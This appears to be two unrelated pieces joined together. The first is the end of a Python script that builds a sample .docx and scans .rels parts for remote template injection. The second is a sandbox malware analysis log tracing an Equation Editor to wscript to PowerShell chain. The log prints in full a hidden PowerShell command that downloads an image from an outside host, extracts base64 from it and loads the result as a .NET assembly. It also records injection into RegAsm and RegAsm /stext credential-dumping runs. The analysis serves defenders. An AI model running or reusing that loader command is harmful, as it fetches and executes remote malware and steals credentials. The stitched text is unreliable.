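                    f'<w:settings xmlns:w="{w_ns}" xmlns:r="{r_ns}"><w:attachedTemplate r:id="rId1"/></w:settings>')
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://zeep.ly/rxgon")
    found = external_relationships(sample)
    for h in found:
        print(h)
    print("remote template injection:", is_remote_template_injection(found))
```

                    Scanning every .rels part rather than only settings.xml.rels also surfaces external oleObject, hyperlink and frame targets, which is why the scanner returns the full list and leaves the template-specific verdict to a separate function; in a mail gateway the presence of any http://, https:// or UNC target in a .rels part of an inbound .docx is already worth a quarantine.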
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                    Source: xrrwwstCMd.docx Stream path 'CONTENTS' entropy: 7.95677072568 (max. 8.0)
                    Source: ~WRD0000.tmp.0.dr Stream path 'CONTENTS' entropy: 7.95677072568 (max. 8.0)
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.dr Stream path '_1787386830/CONTENTS' entropy: 7.95677072568 (max. 8.0)

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040F7E2 Sleep,ExitProcess,12_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A7D9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1183
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1141
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5161
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1518
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9757
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_12-54381
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3700 Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3880 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3824 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916 Thread sleep count: 5161 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908 Thread sleep count: 1518 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956 Thread sleep time: -1800000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956 Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3896 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep count: 118 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep time: -354000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4056 Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep count: 9757 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004 Thread sleep time: -29271000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2956 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00443355 mov eax, dword ptr fs:[00000030h] 12_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h] 12_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,12_2_00411D39
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00434BD8 SetUnhandledExceptionFilter,12_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[garbled encoded payload omitted]'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 12_2_0041812A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00419662 mouse_event, 12_2_00419662
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[garbled encoded payload omitted]'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"
